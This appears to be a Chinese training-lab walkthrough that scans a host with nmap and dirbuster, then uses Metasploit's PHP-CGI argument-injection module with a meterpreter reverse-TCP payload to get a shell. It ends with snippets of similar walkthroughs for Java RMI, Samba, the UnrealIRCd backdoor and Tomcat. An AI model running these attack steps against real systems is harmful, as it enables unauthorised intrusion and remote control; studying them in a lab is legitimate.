Metasploit溢出phpMyAdmin漏洞

利用phpMyAdmin漏洞上传木马程序,获得webshell。

CGI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令。

一、利用nmap工具扫描目标主机

1.1使用nmap命令对目标主机进行扫描。单击桌面空白处,右键菜单选择“在终端中打开”。

1.2在终端中输入命令“nmap –sV  192.168.1.3”,对目标主机进行端口扫描,发现开放80端口。

1.3在浏览器地址栏中输入“http:\\192.168.1.3”,访问目标网站。

二、利用dirbuster扫描目标主机

2.1在终端中输入命令“dirbuster”,启动软件对目标网站进行扫描。

2.2在Target URL处输入“192.168.1.3”,在File with list of dirs./file处选择字典文件(/usr/share/dirbuster/wordlists/目录下),单击“Start”按钮,开始扫描。

2.3扫描结果显示包含cgi-bin目录、phpmyadmin目录等。

三、利用metasploit攻击目标主机

3.1在终端中输入命令“msfconsole”,启动MSF终端。

3.2在终端中输入命令“search php_cgi”,搜索php_cgi的相关工具和攻击载荷。

3.3在终端中输入命令“use exploit/multi/http/php_cgi_arg_injection”,启用漏洞利用模块, 提示符就会提示进入到该路径下。

3.4在终端中输入命令“show payloads”,显示Metasploit中可以在远程主机执行的代码,即shellcode。

3.5在终端中输入命令“set PAYLOAD php/meterpreter/reverse_tcp”,设置使用的shellcode代码。

3.6在终端中输入“show options”,显示攻击模块需要设置的参数。

3.7在终端中输入“set LHOST 192.168.1.2”,设置源主机的IP地址,用于会话的反向链接。

3.8在终端中输入“set RHOST 192.168.1.3”,设置目标主机的IP。

3.9在终端中输入“exploit”,开始对目标主机进行攻击。

3.10在终端中输入“sysinfo”,查看系统环境信息。

3.11在终端中输入“ls”,显示当前目录下的文件内容。

3.12在终端中输入“cat phpinfo.php”,查看文件内容。

时间: 2024-11-09 01:37:04

Metasploit溢出phpMyAdmin漏洞的相关文章

Metasploit溢出java RMI SERVER命令执行漏洞

利用java RMI SERVER命令执行漏洞,获得目标主机root权限. Java RMI Server的RMI注册表和RMI激活服务的默认配置存在安全漏洞,可被利用导致代码执行. 一.利用nmap工具扫描目标主机 1.1使用nmap命令对目标主机进行扫描.单击桌面空白处,右键菜单选择"在终端中打开". 1.2在终端中输入命令"nmap –sV  192.168.1.3",对目标主机进行端口扫描,发现开放1099端口. 1.3在终端中输入命令"msfco

Metasploit溢出samba提权漏洞

Samba是一套实现SMB(server messages block)协议,跨平台进行文件共享和打印共享服务的程序,samba的sambd默认配置在可写文件共享时,存在目录遍历漏洞,远程用户可以通过smbclient端使用一个对称命,创建一个包含..的目录遍历符的软连接 ,可以进行目录遍历以及访问任意文件. 一.利用nmap工具扫描目标主机 1.1使用nmap命令对目标主机进行扫描.单击桌面空白处,右键菜单选择"在终端中打开". 1.3在终端中输入命令"msfconsole

Metasploit溢出UnrealIRCd后门漏洞

利用UnrealIRCd后门漏洞,获取目标主机的root权限. 某些站点的UnrealIRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码,远程攻击者能够执行任意代码. 一.利用nmap工具扫描目标主机 1.1使用nmap命令对目标主机进行扫描.单击桌面空白处,右键菜单选择"在终端中打开". 1.2在终端中输入命令"nmap –sV  192.168.1.3",对目标主机进行端口扫描,发现开放6667端口,对应的服务为unreal ircd.

Metasploit溢出Tomcat管理台默认口令漏洞

利用Tomcat管理台默认口令漏洞,上传木马文件,获得目标主机webshell. Tomcat 管理台安装好后需要及时修改默认管理账户,并杜绝弱口令,成功登陆者可以部署任意web应用,包括webshell. 一.利用nmap工具扫描目标主机 1.1使用nmap命令对目标主机进行扫描.单击桌面空白处,右键菜单选择"在终端中打开". 1.2在终端中输入命令"nmap –sV  192.168.1.3",对目标主机进行端口扫描,发现开放8081端口并且运行着ApacheT

暂停交易?ERC20合约整数溢出安全漏洞案例技术分析(一)

区块链兄弟社区,区块链技术专业问答先行者,中国区块链技术爱好者聚集地 作者:吴寿鹤,<区块链开发实战--以太坊关键技术与案例分析>的第一作者,<区块链开发实战--Hyperledger Fabric关键技术与案例分析>联合作者,IONChain 离子链 首席架构师,hyperLedger核心项目开发人员,区块链技术社区-区块链兄弟联合创始人.github: https://github.com/gcc2ge 来源:区块链兄弟,国内第一家专注区块链技术分享实战的公益性媒体社区 原文链

metasploit魔鬼训练营 (安全漏洞生命周期)

1,前期 渗透测试工程师在挖掘0day的出来的 2,前中期 在一个密封的团体里,互相交流,利用漏洞带来的价值和,金钱 3,中期 安全漏洞被披露!!黑客们快速掌握该漏洞 4,中后期 漏洞被制作成更为简单利用模块和工具,就像前段时间,NSA泄露的工具就是针对ms010-17漏洞 黑客会利用该工具来入侵别人 5,后期 厂家发补丁,安全漏洞消亡

数据库缓冲区溢出漏洞原理(栈)

背景 在数据库系统中已经发现了许多安全漏洞,其中比较严重且危害性比较大的有:缓冲区溢出和SQL注入2种. SQL注入主要依赖于结构化查询语言,每种数据库略有出入:SQL注入漏洞的利用,最主要的威胁是提权:后台维护人员或黑客攻击,可以借此获得DBA权限.需要说明的是,这里所说的SQL注入并不是应用系统的SQL注入,而是数据库自身的注入漏洞,这种漏洞比应用系统的注入漏洞危险性更高:对于SQL注入漏洞的存在,主要是由于数据库中提供的系统或用户函数存在的参数检查不严和语句执行的缺陷.SQL注入漏洞不是本

Metasploit渗透测试魔鬼训练营

首本中文原创Metasploit渗透测试著作,国内信息安全领域布道者和资深Metasploit渗透测试专家领衔撰写,极具权威性.以实践为导向,既详细讲解了Metasploit渗透测试的技术.流程.方法和技巧,又深刻阐释了渗透测试平台背后蕴含的思想. 本书是Metasploit渗透测试领域难得的经典佳作,由国内信息安全领域的资深Metasploit渗透测试专家领衔撰写.内容系统.广泛.有深度,不仅详细讲解了Metasploit渗透测试的技术.流程.方法和技巧,而且深刻揭示了渗透测试平台背后蕴含的思

Linux Glibc幽灵漏洞紧急修补方案【转】

转自:http://blog.csdn.net/chen19870707/article/details/43560823 幽灵漏洞是Linux glibc库上出现的一个严重的安全问题,他可以让攻击者在不了解系统的任何情况下远程获取操作系统的控制权限.目前他的CVE编号为CVE-2015-0235. 什么是glibc glibc是GNU发布的libc库,即c运行库.glibc是linux系统中最底层的api,几乎其它任何运行库都会依赖于glibc.glibc除了封装linux操作系统所提供的系统